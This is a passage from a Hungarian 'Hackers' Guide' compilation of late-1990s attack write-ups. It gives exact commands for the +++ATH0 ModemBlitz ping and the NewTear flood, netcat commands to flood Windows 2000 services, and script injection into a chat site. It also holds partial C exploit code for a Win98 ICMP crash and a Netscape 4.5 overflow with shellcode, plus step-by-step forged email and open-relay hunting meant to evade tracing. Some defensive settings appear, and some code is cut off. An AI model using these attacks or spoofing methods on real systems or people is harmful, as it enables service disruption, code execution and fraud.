gondolat néhány hacker fejében is megfogant, s nemsokára megszületett a<br />

ModemBlitz néven közismert fegyver, amely a modemek egy egyszerű tévedését<br />

kihasználva megszakítja a kapcsolatot.<br />

A támadáshoz valójában nincs szükség külön erre specializálódott programra - a<br />

Linux PING parancsát is paraméterezhetjük úgy, hogy az áldozat modeme<br />

visszaküldéskor parancsnak értelmezze a packetet, s az ott megadottak szerint<br />

203


Hackers’ Guide<br />

cselekedjen ( ping -p 2b2b2b415448300d -c 5 xxx.xxx.xxx.xxx ). A fegyver gyorsan<br />

elterjedt, újabb örömteli perceket szerezve ezzel azon, magukat hackernek nevező<br />

tömegeknek, akik képesek ráclickelni a KILL gombra.<br />

Hogy is működik? Amikor megérkezik a ping a modembe, az feldolgozná... DE! mivel<br />

ECHO REQUESTED a Ping (vagyis válasz kellene rá =)) ezért vissza is indul,<br />

ahonnan jött. Na innen van a bibi. Mivel +++ jellel kezdődik ezért vezérlésnek veszi a<br />

modem, ezért végre hajtja: AT (Attention! vagyis parancs következik) h0 (hangup)...<br />

Dejá vu fog el ezen embereket látván: az egész kísértetiesen emlékeztet a pár évvel<br />

ezelötti WinNuke hadjáratra, amikoris a NetBios hibáját kiaknázva könnyedén<br />

kifagyasztható volt szinte minden Windowsos masina. Eleinte csak azok ismerték<br />

akik komolyabban foglalkoznak a "hálózati biztonságtechnikával", amikor azonban<br />

szélesebb körben elterjedt, emberek százai kattintgattak büszkén a WinNuke ikonra,<br />

hogy megmutassák nagyságukat a tudatlanabbanak. Az átlagos felhasználó<br />

ezidőben szentül hitte, hogy kilőhetetlen, ha egy programmal figyelteti a WinNuke<br />

által használt 139-es (vagy éppen 113-as) portot, s ugyanakkor annak is "tudatában<br />

volt", hogy minden program WinNuke, amivel meg lehet fosztani Windows-át a<br />

ténykedés édes pillanataitól.<br />

Nem kevés Matáv-szitkozódásnak állt valódi háttereként mostanában egy-egy ATH0<br />

parancs - sokszor bármiféle indok nélkül, a gyilkolás felemelő érzéséért, vagy<br />

történetesen azon megalapozott ok miatt, hogy az áldozat nem volt hajlandó a<br />

fenyegetés ellenére sem OP-ot adni IRC-n. úgy látszik, az emberek többsége nem<br />

alkalmas arra, hogy olyan hatalommal bírjon, mely a modemesek 80%-át képes<br />

"elpusztítani".<br />

A ModemBlitz-el ezúttal könnyebb dolgunk van mint a WinNuke-al - annak ellenére,<br />

hogy gyakorlatilag sem tűzfal, sem egyéb védelmi rendszer nem véd meg tőle, ha<br />

egy ügyes támadóval állunk szemben. A védelemhez csupán le kell tiltanunk a +++<br />

parancsokat, azaz a modem extra beállításaihoz<br />

(Sajátgép/Vezérlőpult/Modemek/Tulajdonságok/Kapcsolat/Egyebek/Extra<br />

beállítások) egy "S2=255"-öt kell írnunk. [Linux alatt: /etc/wvdial.conf - > az ATZ<br />

helyére s2=255 -öt kell írni!-H3XR00T] A következő csatlakozás után már sértetlenek<br />

vagyunk - nyugodtan hátradőlve élvezhetjük a netezést, s talán csak néha-néha fog<br />

el egy aggasztó gondolat: vajon azok, akik hatalmukkal nem telefonkapcsolatok,<br />

hanem az emberiség 80%-át képesek elpusztítani, mikor clickelnek a KILL gombra?<br />

Eredeti: ViDe0 [Kiegészítések: H3XR00T]<br />

- H3XR00T -<br />

http://hexnet.hpage.net/<br />

************************************************************************************************<br />

204


A +++ath0 avagy a modemblitz<br />

Tudnunk kell, hogy ez a vonal megszakitasi modszer nem a modemblitz<br />

isteni aldasa. Barki elloheti linux alol vagy unix alol, vagy barmilyen<br />

ping-er segitsegevel, ami tartalmaz pattern lehetoseget (a kuldo hata-<br />

rozza meg a csomag tartalmat). Egy rovid megjegyzes arrol, hogy mijaza<br />

Ping (nem sazkszoveg a kezdok kedveert, a tobbiek meg ugyis tuggyak).<br />

A ping egy olyan adatcsomag amely nevezheto akar halozati hanglokator-<br />

nak is. Segitsegevel megvizsgahatunk cimeket, hogy elnek-e, mennyi<br />

a keses a kuldo es fogado kozott. Ezt az idot nevezhetjuk korbejarasi<br />

idonek is. A lenyeg az, hogy valasz erkezik a jelunkre. Ha gonoszkodni<br />

akarunk szegeny dialup-ossal (modemes gyengebbek kedveert), akkor a<br />

Ping-unket igy kuldhetjuk :<br />

Hackers’ Guide<br />

ping -p 2b2b2b415448300d IP + + + A T H 0 ENTER (mindt tuggyuk... illene...)<br />

(IP helyere persze egy szam kell... >:) )<br />

Lathato, hogy a szamunkra ugy ertekes +++ath0 ascii kodjanak megfelelo<br />

hexa erteket kap (nana' majd azt hitted mehet egybol a +++ath0 ???).<br />

Altalaban nem erdemes igy kuldenunk mert nagyon leterheli a kapcsola-<br />

tunkat. Ezert erdemes megadni a csomagok szamat count-al.<br />

ping -c 5 -p 2b2b2b415448300d IP<br />

Ebben az esetben otszor fog kuldeni ping-et. Ez azert kell mert eltun-<br />

hetnek adatcsomagok es meg fenn marad a celpont... :)<br />

Barmelyiket tesszuk is tok mind1. A lenyeg hogy elerjen a mi kis ajan-<br />

dekunk.<br />

Kerdes :<br />

Miert bont ?<br />

Mikor megerkezik az adat csomagunk (aminek felepiteset itt es most nem<br />

taglalom) akkor ugy beerkezik a modembe... onnan feldolgozasra keulne,<br />

de mivel ECHO REQUESTED a Ping ezert vissza is indul. Na itt kezdodik a<br />

baj. Berkezik a modemunkbe de mivel +++ jellel kezdodik ezert vezerles-<br />

nek tekinti amirol ugy gondolja, hogy buta op rendszerunktol jott.<br />

Ezert elkezdi vegre hajtani : az AT egy parancstipus a modemben.<br />

a h0 pedig a hangup-ot jelzi. Szal' pusztan ennyi. Itt most ugye<br />

kene egy kis halo ismeret, egy kis op rendszer ismeret, eegy kis hw<br />

ismeret, hogy ugyan akkor hogyan... De ezt talan majd kesobb...<br />

Hogyan is vedjuk ?<br />

Win alol eleg ecceru a dolog. Ecceruen beaalitod, hogy a modemed ne a<br />

+++ -t vegye vezerlesnek hanem valami mast. Ennek beallitasa Angol<br />

Win95/98 alatt:<br />

My computer -=> Dial-Up net -=> valamelyik connecten jobb klikk es<br />

properties -=> Connect using Configure -=> Connection -=> Advanced<br />

205


Hackers’ Guide<br />

-=> Extra settings-be ird be : s2=szam (szam egy 0 es 255 koze eso<br />

szam, lehetoleg ne 43 legyen... az az alap... :) )<br />

Magyar Win95/98-t meg ne hasznaljatok ! De amugy ua. ...<br />

Sajat gep -=> Telefonos hal. -=> valamelyik connecten jobb klikk es<br />

tulajdonsagok -=> Kapcsolat Beallitas(?) -=> Kapcsolat -=> Advanced(?)<br />

-=> Extra beallitasok.<br />

Linux:<br />

/etc/wvdial.conf -=> az ATZ helyére hogy s2=255<br />

Ez persze mind azert lett leirva, hogy ki tudjatok vedeni. NEM AZERT,<br />

hogy lojjetek !<br />

Inkabb legyunk bekeben. Az a legjobb...<br />

LipIQe<br />

Ha kerdesed lenne:<br />

lipiqe@freemail.c3.hu<br />

************************************************************************************************<br />

NewTear<br />

A NewTear olyan csomagokat kuld a celgepre, melyeket az aztan nem tud<br />

osszerakni, es ebbe bizony beledoglik meg az SP4-es NT4Wks is... SP5 alatt nem<br />

lett tesztelve egyebkent. Termeszetesen csak linux alatt muxik... Erdemes egy masik<br />

virtualis terminalon ezt hasznalni ezzel parhuzamosan (csak linux alatt):<br />

ping -f IPCIM -s 8096<br />

Egy tipikus tamadas:<br />

newtear FAKEIPCIM CELGEPIPCIM -n 20000<br />

Ekkor 20000-szer kuldi el a cuccost, en minimum ennyivel nyomatom.<br />

Elviekben tehat az NT lazan kidumpol tole, nagy karokat lehet vele okozni, es ez<br />

nem reklamszoveg!<br />

Vedekezes: gumival, de jobb, ha a TCP/IP beallitasoknal nezunk korul, es az UDP-t<br />

csak meghatarozott portokon engedelyezzuk, eleg szivacs melo, jobb elerekni az<br />

NT-s halo ele egy jo routert, ami szuri a csomikat... En a Cisco 2620-ast tudom<br />

ajanlani, az a tuti.<br />

NewTear letöltése<br />

206<br />

KohiNoor


Hackers’ Guide<br />

************************************************************************************************<br />

DoS Tamadasok fajtai<br />

by Lord Lsd<br />

FIGYELEM! Ennek a leirasnak a megertesehez kell nemi ismeret az internet<br />

mukodeserol, ugyhogy ha nem joban ezzel a Tmaval ne is folytasd az olvasast!<br />

Csapjunk a lovak koze:<br />

Bonk> Spoofolt udp csomagokat kuld. Eloidezhet ujraindulasokat is!<br />

Boink> A Bonk tovabbfejlesztett valtozata<br />

Teardrop> Kihasznalja a win95/NT hibajat. 2.0.32-nel alacsonyabb szintu Linux<br />

kernelnel is mukodik<br />

Newtear> A Teardrop masik valtozata<br />

Ping -f> A leghatasosap modszer az internet kapcsolat megszakitasara, de root<br />

jogunak kell lenned,hogy meg bird csinalni.<br />

Egyeb leirasokert, programokert nezd meg a rootshell.com-t!<br />

************************************************************************************************<br />

Internetto chat szivatás<br />

-=[Bevezetõ]=-<br />

Egyik nap Fishbone osztálytársammal az sztech teremben üldögéltünk...<br />

...már qurvára unatkoztam, amikor felhívta a figyelmem a<br />

www.internetto.hu/stb/presszo internetes chat oldalra...<br />

-=[Maga a lényeg]=-<br />

Begépeltem és lõn-csoda, lõn-világosság bejött... ;] Szal' kb. 1 perce chateltunk<br />

amikor eszrevettem valamit a rendszerben. Hibának nem nevezném, mert ezeket a<br />

cgi-s chateket ugy gyártottak, hogy amit azt ugyanugy jeleníti meg tehat a közti<br />

szöveget értelmezi, tehát parancsnak tekinti és lefutatja... ;]<br />

-=[Tippek]=-<br />

207


Hackers’ Guide<br />

A következõ üzenet amit gépeltem: Megy???? ;] <br />

és még valami a java-s cuccokat is futtatja.<br />

Nos volt egy gondolat fosszfányom, méghozzá, hogy valószímûleg mindenki<br />

windowsból nyomja java tamogatással. Otthon elkeztem irogatni a javas cuccokat az<br />

estére. Az eredmény kb. 3 óra csend a presszóban. ;] Kb ilyen dolgokat irogattam<br />

este:<br />

setTimeout("top.location.href = '/con/con'",1);<br />

<br />

Aki erti a java nyelvet annak világos a kód, aki meg nem az probalja ki... irja be egy<br />

*.htm filebe es nyissa meg. ;] Ezt a kódot egyébként a bizonyos freames bannerek<br />

kiírtására terveztem.<br />

Akkor a következõ trükköm az volt hogy fogtam és elmentettem az egész oldalt<br />

fogtam és a küldés gombra bármilyen linket rátettem és az elõzõ scriptet futtattam<br />

csak a /con/con helyett az oldal helye volt.<br />

Akkor ez is java:<br />

while (1 != 2){self.parent.close()} <br />

ez is laza... ugyanebbol kiundúlva:<br />

while (1 != 2){alert('www.rulezlinux.com')} <br />

A dolognak egyetlen "hibája" van, szóval a dolgokat csak akkor hajlando futtatni ha<br />

egy sorba irod, tehát nincs enter a kódban.<br />

A többit talaljátok ki! ;]<br />

-=[a Végére...]=-<br />

Ez a text csak szemléltetés! ;]<br />

Special Thanx tO: fiShBonE<br />

bY: DomIni$<br />

mailto: root@rulezlinux.com<br />

www.rulezlinux.com<br />

#silver<br />

************************************************************************************************<br />

NUKING IS LAMEEE....<br />

avagy ismertető a közelmúlt legismertebb háborúzó programjáról.<br />

208


Mi az a NUKE ?<br />

Hackers’ Guide<br />

Akkor beszélünk NUKE támadásról, ha valaki szándékosan ún. OOB (Out of Bands<br />

vagy Out of Bounds) adatokat küld neked. Ezeknek az adatoknak ez elküldésével,<br />

eléri, hogy összeomoljon a számítógéped és beálljon a híres kék halál. Windows 95<br />

esetében valószínűleg valami hasonló jelenik meg:<br />

Fatal exception 0E at 0028: in VxD MSTCP(01) + 000041AE.<br />

This was called from 0028: in VxD NDIS(01) + 00000D7C.<br />

Itt látszik, hogy a MSTCP-t és az NDIS-t hibáztatja.<br />

NT-n még nem láttam nagy halált, úgyhogy nem tudom mit ír ki, csak annyit tudok,<br />

hogy ott a TCPIP.SYS szerinte a hiba oka.<br />

Mi történik ha NUKE-olt valaki ?<br />

Mint már említettem, ha NUKE támadás ért, akkor hibaüzenetettel összeomlik a<br />

rendszer. A Windows 95 megszakítja a kapcsolatot, de nem biztos, hogy újra kell<br />

indítani a gépet (azért ajánlott). Az NT esetében - szinte - mindig újra kell indítani a<br />

gépet.<br />

Hogyan működik ?<br />

NT esetében:<br />

A küldő egy "Out of Band" adatot határoz meg, úgy, hogy egy ún. "urgent bit flag"-et<br />

(kb. sürgető bit flag) rak a TCP fejlécébe. Az adat fogadója az ún. "urgent pointer"-t<br />

(ezt inkább le sem fordítom, mert olyan hülyén hangzana) használja annak<br />

meghatározására, hogy az "urgent data" hol ér véget. A Windows NT-ben a bug az<br />

alábbi módon jelenik meg: ha az "urgent pointer" az adatszerkezet végére mutat és<br />

azt nem követi - számára - értelmes adat, akkor fagyi van. Az NT-nek "normális"<br />

adatokra lenne szüksége.<br />

Win95 esetében:<br />

Erről sajnos nincs megbítható információ, de annyi biztos, hogy nem tudja kezelni az<br />

OOB adatokat és emiatt van a hiba.<br />

Általában a NUKE-ot a 139-es porton szokták küldeni, ugyanis ez a port a<br />

leggyakrabban nyitott (Netbios - nbsession). Nemcsak a 139-es port támadható,<br />

hanem minden olyan port, ami nyitva van. (általában 53, 113, 139, 80) A nyitott<br />

portokról, portscannerek segítségével szerezhetsz információt. Ilyen portscannerek<br />

(is) találhatóak a http://w3.swi.hu/enfusia oldalán.<br />

Mikor vagyok támadható ?<br />

209


Hackers’ Guide<br />

1., Windows 95-öt használsz (összes verzió).<br />

2., Windows NT 3.51-ed van.<br />

3., Windows NT 4.0-ád van SP3 nélkül.<br />

4., Windows 3.11-ed van.<br />

Hogyan tudom megvédeni magam ?<br />

1., Win95 - vtcpupd.exe<br />

2., WinNT 4.0<br />

- SP2 - ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/NT40/<br />

- SP3 - ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/NT40/<br />

3., Win 3.11<br />

1., Baktass el a SYSTEM könyvtárba és keresd meg a system.ini file-t.<br />

2., Ezt írd be közvetlenül az: [MSTCP] rész után: BSDUrgent=0<br />

Frissítettem a rendszerfile-okat, de meg szeretném tudni, hogy védve vagyok-e.<br />

Ha mindenáron lövetni szeretnéd magad, akkor látogass el a<br />

http://www.yikes.com/nuke/ címre, ahol addig lövetheted magad, amíg akarod.<br />

Hogyan tudom megnézni, hogy ki támad ?<br />

Manapság már kismillió ilyen program van. Én személy szerint a Nukenabbert<br />

kedvelem, azért is, mert jelzi a portscannelést. Ha le akarod tölteni akkor ajánlom a<br />

http://w3.swi.hu/enfusia címet, ami kis kezem munkája (hááát igen minden<br />

"szentnek" maga felé hajlik a keze...).<br />

Sea-you<br />

sea-you@freemail.hu<br />

************************************************************************************************<br />

Win98 TCP/IP bug<br />

A Win98 TCP/IP - je az ICMP-Type13 (timestamp request) csomagoktol behal !!<br />

Ennek a kihasznalasara itt van egy kis program:<br />

#include <br />

#include <br />

#include <br />

#include <br />

#include <br />

#include <br />

#include <br />

210


#include <br />

#include <br />

#include <br />

#define __FAVOR_BSD<br />

#include <br />

#include <br />

#include <br />

#define IP_SIZE sizeof( struct iphdr )<br />

u_short<br />

in_cksum( u_short *addr, int len )<br />

{<br />

int nleft = len;<br />

u_short *w = addr;<br />

int sum = 0;<br />

u_short answer = 0;<br />

int<br />

/*<br />

* Our algorithm is simple, using a 32 bit accumulator (sum), we add<br />

* sequential 16 bit words to it, and at the end, fold back all the<br />

* carry bits from the top 16 bits into the lower 16 bits.<br />

*/<br />

while( nleft > 1 )<br />

{<br />

sum += *w++;<br />

nleft -= 2;<br />

}<br />

/* mop up an odd byte, if necessary */<br />

if (nleft == 1)<br />

{<br />

*( u_char *)( &answer ) = *( u_char *)w;<br />

sum += answer;<br />

}<br />

/* add back carry outs from top 16 bits to low 16 bits */<br />

sum = ( sum >> 16 ) + ( sum & 0xffff ); /* add hi 16 to low 16 */<br />

sum += ( sum >> 16 ); /* add carry */<br />

answer = ~sum; /* truncate to 16 bits */<br />

return( answer );<br />

}<br />

Hackers’ Guide<br />

211


Hackers’ Guide<br />

send_icmp_packet( int sock_send, u_long src_addr, u_long dst_addr )<br />

{<br />

char *packet, *cksum; /* packet, cksum */<br />

int send_status, loop;<br />

struct iphdr *ip; /* ip header */<br />

struct icmp *icp; /* icmp header */<br />

struct sockaddr_in from; /* sockaddr */<br />

struct sockaddr_in to; /* sockaddr */<br />

/************************************/<br />

/* get and init packet_memory_area */<br />

/************************************/<br />

packet = ( char *)malloc( IP_SIZE + 20 );<br />

ip = ( struct iphdr *)( packet );<br />

icp = ( struct icmp *)( packet + IP_SIZE );<br />

memset( packet, 0, IP_SIZE + 20 );<br />

/****************/<br />

/* IP header */<br />

/****************/<br />

ip->saddr = src_addr;<br />

ip->daddr = dst_addr;<br />

ip->version<br />

Petycomp<br />

************************************************************************************************<br />

D.o.S-ra alkalmas bug a W'2000-ben<br />

Fordította:HSi<br />

Röviden:<br />

Szolgáltatás szüneteltetését lehet elérni különbözõ portok igénybevételével Windows<br />

2000-es szerverekkel felszerelt hálózatokon. A támadások többségével 100%-os<br />

processzorterhelést lehet elõidézni egy Windows 2000-es szerveren<br />

Részletek:<br />

212


Hackers’ Guide<br />

A Windows 2000 különbözõ szolgáltatásai védtelenek egy egyszerû támadással<br />

szemben, melyekkel távoli felhasználok rövid idõn belül akár 100%-ra is<br />

felpörgethetik a szerver processzorát, ráadásul ezzel nem is terhelik meg nagyon<br />

saját gépüket.<br />

A hiba a következõ portok elérésekor jelentkezik: TCP portok közül: 7, 9, 21, 23,<br />

7778 ; UDP portok közül: 53, 67, 68, 135, 137, 500, 1812, 1813, 2535, 3456.<br />

Amíg a célgép ki nem dõl, addig a processzor terheltsége jelentõsen emelkedik,<br />

egészen a 100%-ig.<br />

Linux alatt a hibát nagyon egyszerûen ki lehet használni a netcat programmal, ha a<br />

/dev/zero eszközt használjuk bemenetnek. Pl.: "nc target.host 7 < /dev/zero" a TCP<br />

portokra, míg az UDP portokra: "nc -u target.host 53 < /dev/zero"<br />

Mivel a hiba kihasználásával több szolgáltatás is elérhetetlenné válik viszonylag<br />

egyszerûen és rövid idõn belül, az egész disztribucióra nézve nagy veszélyt hordoz<br />

magában.<br />

Bõvebb információ:<br />

A hibát a SecureXpert jelentette.<br />

Eredeti szerzõ:SecureXpert<br />

Eredeti cím: New Denial of Service attacks on Windows 2000 Server<br />

************************************************************************************************<br />

Pirch'98 ident/fserve daemon DoS támadás<br />

Ez a cikk fordítás, az eredeti cikket írta: Chopsui-cide/MmM '00 - The Mad Midget<br />

Mafia - http://midgets.box.sk/<br />

A Pirch98 IRC kliens le tud állni egy egyszeru túlcsordulás miatt, ha az fserve vagy<br />

az ident daemon aktív.<br />

A forráskód:pirch98.c<br />

Scalpal<br />

************************************************************************************************<br />

213


Hackers’ Guide<br />

War FTP DoS (MKD/CWD)<br />

Ez a cikk fordítás, az eredeti cikket írta: Toshimi Makino -crc@sirius.imasy.or.jp<br />

A War FTPd egy nagyon népszeru FTP server Windows 95-höz, 98-hoz és NT-hez.<br />

Egy új DoS támadást találtak a napokban a War FTPd server ellen. Ez az új támadás<br />

eléggé egyszeru, egy buffer túlcsordulásból áll, ami végbemegy, ha egy hosszú<br />

parancsot küldessz az FTP session alatt!<br />

A forráskód:warftpd-dos.c<br />

Scalpal<br />

************************************************************************************************<br />

Netscape Nav./Com. 4.5 buffer túlcsordulás<br />

Ez a cikk fordítás, az eredeti cikket írta: Steve Fewerdarkplan@oceanfree.net<br />

A buffer túlcsordulás a Netscape Navigatornál egy futtatható önhatalmú kódot<br />

használhat. Ez egy helyi támadás, ahol a bántó fél a felhasználó fájlja a "prefs.js",<br />

általában a c:\program files\netscape\users\***, ahol a felhasználó van. A<br />

túlcsordulás akkor fordul elo, amikor a Netscape Navigator által olvasott adat<br />

nagyobb, mint 80 bájt a network.proxy.http mezoben.<br />

Az exploit forráskódja:netsexp.txt<br />

Scalpal<br />

related to - Netscape Navigator/Communicator 4.5<br />

By adding the following line to the preferences file of Netscape Navigator:<br />

user_pref("network.proxy.http","AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC");<br />

Netscape Navigator crashes and can be caused to execute arbitrary code,<br />

compromising system security.<br />

Exploit:<br />

214


/* Stack based buffer overflow exploit for Netscape Navigator 4.5<br />

* Author Steve Fewer, 22-12-99. Mail me at darkplan@oceanfree.net<br />

*<br />

* Netscape Navigator causes a buffer overflow when reading from<br />

* the users "prefs.js" file. If it reads a string longer than 80<br />

* bytes in the user_pref("network.proxy.http", "proxy.com");<br />

* field it smashes the stack overwrighting the EIP and EBP. This<br />

* can be used to execute arbitrary code.<br />

*<br />

* Tested with Netscape Navigator 4.5 using Windows98 on an Intel<br />

* PII 400 with 128MB RAM<br />

*<br />

* http://indigo.ie/~lmf<br />

*/<br />

#include<br />

#include<br />

int main()<br />

{<br />

printf("\n\n\t\t........................................\n");<br />

printf("\t\t.....Netscape Navigator 4.5 exploit.....\n");<br />

printf("\t\t........................................\n");<br />

printf("\t\t.....Author: Steve Fewer, 22-12-1999....\n");<br />

printf("\t\t.........http://indigo.ie/~lmf..........\n");<br />

printf("\t\t........................................\n");<br />

printf("\t\t.....-==-......\n");<br />

printf("\t\t......Magyar Nyelvu Hack Leirasok.......\n\n");<br />

Hackers’ Guide<br />

// the first 80 bytes. These get blown away when the stack goes down.<br />

char buff[96];<br />

// the EBP, we don't need to use it so fill it with B's<br />

char ebp[8] = "BBBB";<br />

// we point the EIP into msvcrt.dll v6.00.8397.0 where we find a JMP ESP @<br />

7FD035EB<br />

char eip[8] = "\xEB\x35\xD0\x7F";<br />

// the is our 'arbitrary code', it just runs a file app.exe from the<br />

\WINDOWS\COMMAND directory then calls exit() to clean up<br />

char sploit[128] =<br />

"\x55\x8B\xEC\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x61\xC6\x45\xF9\x70\xC6\x45<br />

\xFA\x70\xC6\x45\xFB\x2E\xC6\x45\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\xB8<br />

\x24\x98\x01\x78\x50\x8D\x45\xF8\x50\xFF\x55\xF4\x55\x8B\xEC\xBA\xFF\xFF\xFF\<br />

xFF\x81\xEA\xFB\xAA\xFF\x87\x52\x33\xC0\x50\xFF\x55\xFC";<br />

FILE *file;<br />

for(int i=0;i<br />

215


Hackers’ Guide<br />

************************************************************************************************<br />

Fake Email<br />

Tartalom<br />

I. Fake Email<br />

II. Pelda<br />

I. Fake Email<br />

Email<br />

Valoszinuleg sok fake mailrol szolo dokut olvastatok mar, itt van meg egy. Ha<br />

nevtelenul szeretnel vkinek, vkiknek emailt kuldeni a legegyszerubb egy anonymous<br />

mail program hasznalata. Azonban ha a regi jol bevalt modszert akarod hasznalni<br />

akkor tessek. Az elso dolgod, hogy telnetelj be barmilyen UNIX alapu gep 25-os<br />

portjara. Az eredmeny valahogy igy fog kinezni:<br />

220 dickheads.com ESMTP<br />

Sendmail 8.8.8/8.8.8/Debian/GNU; Fri, 9 Apr 1999 13 :24:06 +0200.<br />

Utana johet a HELP parancs:<br />

214-This is Sendmail version 8.8.8<br />

214-Topics:<br />

214- HELO EHLO MAIL RCPT DATA<br />

214- RSET NOOP QUIT HELP VRFY<br />

214- EXPN VERB ETRN DSN<br />

214-For more info use "HELP ".<br />

214-To report bugs in the implementation send email to<br />

214- sendmail-bugs@sendmail.org.<br />

214-For local information send email to Postmaster at your site.<br />

214 End of HELP info<br />

Ezutan beirod, hogy helo [IP vagy hostname]. Ha a helo nem mukodne akkor<br />

ehlo-t irj. Ezutan meg kell adni a sender nevet. Ez lehet barmi. Tehat irjuk:<br />

216


mail from: CableBreakers<br />

Ezt kovetoen a cimzett kovetkezik, ide egy igazi mail cimet irjunk.<br />

rcpt to: clinton@monica.gov<br />

A kovetkezo lepes maga a level. A data parancs kiadasaval elkezdhetjuk irni a<br />

szoveget. Ha vegeztunk egy "." utan zarhatjuk a dolgot, majd quit.<br />

Ugye milyen egyszeru? >:)<br />

II. Pelda<br />

Hackers’ Guide<br />

telnet clinton.monica.gov<br />

Trying xy...<br />

Connected to clinton.monica.gov.<br />

Escape character is '^]'.<br />

220 clinton.monica.gov ESMTP Sendmail 8.9.3/8.8.8; Thu, 8 Apr 1999 13:33:35<br />

+0200<br />

helo clinton.monica.gov<br />

250 clinton.monica.gov Hello kenneth@starr.com [666.666.666.666], pleased to<br />

meet you<br />

mail from: CableBreakers<br />

250 CableBreakers... Sender ok<br />

rcpt to: clinton@monica.gov<br />

250 clinton@monica.gov... Recipient ok<br />

data<br />

354 Enter mail, end with "." on a line by itself<br />

Yippee!<br />

.<br />

250 NAA29263 Message accepted for delivery<br />

quit<br />

221 clinton.monica.gov closing connection<br />

Connection closed by foreign host.<br />

=====Cable<br />

Breakers=====================1999=========KerNel^Panic=============<br />

==<br />

************************************************************************************************<br />

Hogyan küldjünk álcázott leveleket? (fakemail)<br />

217


Hackers’ Guide<br />

Most bemutatom, hogyan lehet úgy e-mailt küldeni, hogy nagyon nehezen lehessen<br />

minket visszanyomozni. Ehhez a telnet.exe nevű programot fogjuk használni, ami<br />

minden operációs rendszerben benne van. Indítsuk el: Start>Run, és írjuk be: telnet.<br />

Tegyünk egy kis kitérőt. A levelezés manapság az Interneten az SMTP (Simple Mail<br />

Transfer Protocol) szabályrendszerrel megy. Ez azt jelenti, hogy ha bizonyos<br />

szabályokat betartunk, akkor a világon bármely mailszerver el fogja fogadni a feladott<br />

levelünket. Most lépésről lépésre végigmegyünk a levél elküldésének<br />

mechanizmusán. Nem bonyolult. Az összes levelezőprogram (Outlook Express,<br />

Pegazus Mail stb.) ezt a protokollt használja, csak kiegészíti néhány extrával.<br />

A következő példában küldünk egy e-mailt a billgatez@microsoft.com címre, és úgy<br />

fogjuk álcázni a levelünket, hogy úgy tűnjön, mintha az orban@parlament.hu címről<br />

jött volna (ezek kitalált címek. Ahhoz, hogy a levél el is menjen, a címzettnek<br />

létezőnek kell lennie.)<br />

>>MS Windows 9x


Hackers’ Guide<br />

Ez mind nagyon szép és jó. A címzett azt fogja látni, hogy a feladó e-mail címe<br />

orban@parlament.hu de ezzel még nem rejtettük el a nyomainkat. Minden<br />

levelezőprogramban van egy funkció, amellyel a levél összes fejlécét meg lehet<br />

nézni. Ezt a fejlécet a levél lezárása után a mailszerver illeszti a levélhez. Ebben a<br />

fejlécben többek között benne lesz az IP-címünk is, amelyről a szerverre<br />

bejelentkeztünk. Ez alapján még mindig visszanyomozhatóak vagyunk, tehát a<br />

mailszerverre történő bejelentkezés előtt menjünk keresztül egy proxyn (SOCKS<br />

vagy WinGate vagy egyéb), hogy megnehezítsük a visszakeresésünket. (Lásd a<br />

Proxyk című írást.)<br />

Léteznek olyan mailszerverek, amelyek hajlandóak továbbítani a levelünket egy<br />

másik mailszerverhez. Ezáltal az IP címünk nem fog megjelenni a címzettnél a levél<br />

fejlécében. Ha találunk ilyet, akkor a címzett mailszervere helyett ehhez<br />

csatlakozhatunk, a művelet többi része azonos a fent leírtakkal. Azonban ilyet nehéz<br />

találni. Leírok egy módszert, hogyan lehet ilyeneket keresni.<br />

Először is, ne katonai és ne kormányszervezeteknél próbálkozz, hanem oktatási<br />

intézményeknél: egyetemek, főiskolák, középiskolák hálózatain (kisebb az esélye,<br />

hogy lebuksz, és sok rendkívül rosszul konfigurált szerver van). Ehhez használj egy<br />

internetes keresőrendszert ( http://altavizsla.matav.hu/, http://heureka.net.hu/, stb.)<br />

és keress rá arra, hogy "egyetem" meg "főiskola" meg "középiskola" és próbáld<br />

megszerezni minél több iskolának a honlapcímét. Ha például találsz egy ilyet:<br />

http://www.egyetem.hu, akkor valószínűleg a mailszervere URL-je mail.egyetem.hu<br />

vagy www.egyetem.hu lesz. Csinálj egy hosszú listát, és telnettel nézd végig őket.<br />

Ha a mailszerver támogatja a továbbítást (routing) akkor az RCPT TO: blabla<br />

parancs kiadása után nem kapunk hibaüzenetet. Ha kapunk, akkor a mailszerver<br />

nem is fogja elküldeni a levelünket, hanem "Routing denied" vagy valami hasonló<br />

hibaüzenetet ad. Ekkor húzzuk ki a szervert a listából és próbálkozzunk a<br />

következővel :)<br />

Macerás dolog, és keveset fogunk találni (ha egyáltalán). Ne használjuk egy szervert<br />

ilyen célokra túl sokat, mert észreveszik és letiltják.<br />

Nem, nem adok mailszerver listát :) Keress magadnak, ahogy bárki más. Max.<br />

cserébe..<br />

Voyager2<br />

************************************************************************************************<br />

Spoofed mail bombing by ReWtEr<br />

Itt van egy kis kibaszas arra az esetre hogyha iszonyu agressziv es nagyon gonosz<br />

emberek vagyunk es y0l ki akarunk szurni egy egy sot KETTO rencergizdaval, avagy<br />

hogy uszitsuk egymasra ket rendszer rendszergazdait akiket nem szeretunk ;)<br />

219


Hackers’ Guide<br />

Tegyuk fel, hogy van 3 rendszer:<br />

1: attak.com (ezek vagyunk mi)<br />

2: friendofsux.com (az aldozat barat rendszere, amelyben megbizik (trusted system))<br />

3: sux.com (az aldozat maga)<br />

Nekunk mondjuk nem tetszik hogy friendofsux.com sux.com baratja es ugy dontunk<br />

hogy egymasra akarjuk oket uszitani. Vagy egyszeruen csak meg akarjuk szivatni<br />

mindket rendszert. Vagy csak ki akarjuk probalni ebben a textben leirtakat. Ne kelljen<br />

mar nekem okokat talalni a lenyeg hogy:<br />

Minden hacker wannabe tudja hogy hogy kell sendmailelni a 25-os portrol akamilyen<br />

rendszerrol es azt is hogy hogy kell spoofed mailt kuldeni ezen az uton ugy, hogy ne<br />

nagyon kapjanak el. Aki nem tudja annak nem erdemes ezt a textet vegigolvasnia.<br />

Sz'al ha lama vagy elhuzhacc a jo budos francba mer' ez nem neked valo. Ha az<br />

vagy nem kell tovabb olvasni. De tegyuk fel hogy aki eljutott idaig az nem lama.<br />

